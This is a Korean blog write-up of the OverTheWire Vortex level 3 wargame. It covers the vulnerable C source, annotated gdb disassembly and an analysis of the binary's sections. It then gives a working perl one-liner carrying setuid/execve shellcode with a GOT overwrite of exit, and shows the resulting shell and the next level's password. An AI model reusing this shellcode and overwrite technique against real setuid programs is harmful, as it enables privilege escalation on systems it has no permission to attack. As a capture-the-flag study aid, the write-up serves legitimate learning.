(vortex)level3->level4

과거의 컴퓨터 공부/Overthewire@vortex 2014. 9. 7. 01:50
반응형

A Stack Overflow with a Difference

This level is pretty straight forward. Just sit down and understand what the code is doing. Your shellcode will require a setuid(LEVEL4_UID) since bash drops effective privileges. You could alternatively write a quick setuid(geteuid()) wrapper around bash.

NOTE: ctors/dtors might no longer be writable, although this level is compiled with -Wl,-z,norelro. Lookup some information about this e.g. here

NOTE에서 볼수있듯이 더이상 ctors/ dtors 부분을 사용할수 있는 상태가 아니다 .. 저거도 안읽어보고 문제를 푸니까 당연히 안풀리지 .. 


[소스]

/*

 * 0xbadc0ded.org Challenge #02 (2003-07-08)

 *

 * Joel Eriksson <je@0xbadc0ded.org>

 */


#include <string.h>

#include <stdlib.h>

#include <stdio.h>


unsigned long val = 31337;

unsigned long *lp = &val;


int main(int argc, char **argv)

{

        unsigned long **lpp = &lp, *tmp;

        char buf[128];


        if (argc != 2)

                exit(1);


        strcpy(buf, argv[1]);


        if (((unsigned long) lpp & 0xffff0000) != 0x08040000)

                exit(2);


        tmp = *lpp;

        **lpp = (unsigned long) &buf;

        // *lpp = tmp; // Fix suggested by Michael Weissbacher @mweissbacher 2013-06-30


        exit(0);

}

처음에 포인터가 너무많아서 좀 당황했다 그리고 exit(0) 부분 때문에 보통의 bof는 먹히지 않는 상태이다

[summary]


lpp -> lp-> val [&buf]

lpp -> lp -> dtors[&buf] 

lpp -> lp  -> $exit@got 


[gdb]

(gdb) set disassembly-flavor att

(gdb) disas main

Dump of assembler code for function main:

   0x080483f4 <+0>: push   %ebp

   0x080483f5 <+1>: mov    %esp,%ebp

   0x080483f7 <+3>: and    $0xfffffff0,%esp     ; 0xffffffff-0xfffffff0 +1 = 16

   0x080483fa <+6>: sub    $0xa0,%esp   ;0xa0=160  ,esp 에 160바이트 할당  ,dummy 가 껴있는 것 같다 

   0x08048400 <+12>: movl   $0x804974c,0x9c(%esp)    

  0x0804840b <+23>: cmpl   $0x2,0x8(%ebp)         ; argc =2 인지 비교함 

   0x0804840f <+27>: je     0x804841d <main+41>        ;argc=2라면 main +41로 jmp

   0x08048411 <+29>: movl   $0x1,(%esp)       ;아닐경우

   0x08048418 <+36>: call   0x8048320 <exit@plt>     ; exit@plt 호출

   0x0804841d <+41>: mov    0xc(%ebp),%eax     ; argv[0]을 eax에 넣는다

   0x08048420 <+44>: add    $0x4,%eax     ;argv[0] +4

   0x08048423 <+47>: mov    (%eax),%eax

   0x08048425 <+49>: mov    %eax,0x4(%esp)    ;argv[1]의 주소를 스택에 넣어줌

   0x08048429 <+53>: lea    0x18(%esp),%eax

   0x0804842d <+57>: mov    %eax,(%esp)

   0x08048430 <+60>: call   0x8048300 <strcpy@plt>

   0x08048435 <+65>: mov    0x9c(%esp),%eax

   0x0804843c <+72>: mov    $0x0,%ax

   0x08048440 <+76>: cmp    $0x8040000,%eax

   0x08048445 <+81>: je     0x8048453 <main+95>

   0x08048447 <+83>: movl   $0x2,(%esp)

   0x0804844e <+90>: call   0x8048320 <exit@plt>

   0x08048453 <+95>: mov    0x9c(%esp),%eax

   0x0804845a <+102>: mov    (%eax),%eax

   0x0804845c <+104>: mov    %eax,0x98(%esp)

   0x08048463 <+111>: mov    0x9c(%esp),%eax

   0x0804846a <+118>: mov    (%eax),%eax

   0x0804846c <+120>: lea    0x18(%esp),%edx

   0x08048470 <+124>: mov    %edx,(%eax)

   0x08048472 <+126>: movl   $0x0,(%esp)

   0x08048479 <+133>: call   0x8048320 <exit@plt>    ; exit 호출 


[structure]

buf[128]    |    dummy [8]   |    tmp [4]   |    lpp [4]   |    dummy [8]  |    SFP[4]    |    RET[4]


vortex3@melinda:/vortex$ objdump -h vortex3 |grep dtors

 18 .dtors        00000008  0804964c  0804964c  0000064c  2**2


vortex3@melinda:/vortex$ objdump -s -j .data ./vortex3


./vortex3:     file format elf32-i386


Contents of section .data:

 8049740 00000000 00000000 697a0000 48970408  ........iz..H...

val 값 31337(hex : 7a69)가 들어가있는거로 보아서 분명 제대로 찾아왓다 .. 

gdb 로 분석해보았다 


(gdb) x/x 0x8049730

0x8049730 <strcpy@got.plt>: 0x08048306

(gdb) 

0x8049734 <__gmon_start__@got.plt>: 0x08048316

(gdb) 

0x8049738 <exit@got.plt>: 0x08048326

(gdb) 

0x804973c <__libc_start_main@got.plt>: 0x08048336

(gdb) 

0x8049740 <data_start>: 0x00000000

(gdb) 

0x8049744 <__dso_handle>: 0x00000000

(gdb) 

원래 이사이에 p.0이 존재해줘야되는데 보이지가 않는다 ;; 


0x8049748 <val>: 0x00007a69

(gdb) 

0x804974c <lp>: 0x08049748

(gdb) 

0x8049750 <completed.6159>: 0x00000000

(gdb) 

0x8049754 <dtor_idx.6161>: 0x00000000

(gdb) 

------------------------------------------------------------------------------------



[attack] ->GOT overwrite

shell code(34)     |    NOP[106]    |  $exit@got (exit@plt +2=  exit@got 이다 왜냐하면  jmp instruction이 2바이트 이기 때문이다) 

vortex3@melinda:/vortex$ ./vortex3 `perl -e 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80","\x90"x106,"\x22\x83\x04\x08"'`

$ cat /etc/vortex_pass/vortex4

2YmgK1=jw

`

`



c.f) 

~> p.0가 dtors를 가리키고 있다


+).dtors 영역 

http://www.exploit-db.com/papers/13234/

http://bbolmin.tistory.com/34 

참조 

반응형

'과거의 컴퓨터 공부 > Overthewire@vortex' 카테고리의 다른 글

(vortex)vortex5 -> vortex 6  (0) 2014.09.08
(vortex) level4-> level 5  (0) 2014.09.07
(Vortex)Level2->Level3  (0) 2014.09.05
(vortex) Level1 -> Level2  (0) 2014.09.05
(vortex) Level 0 -> Level1  (0) 2014.09.05
,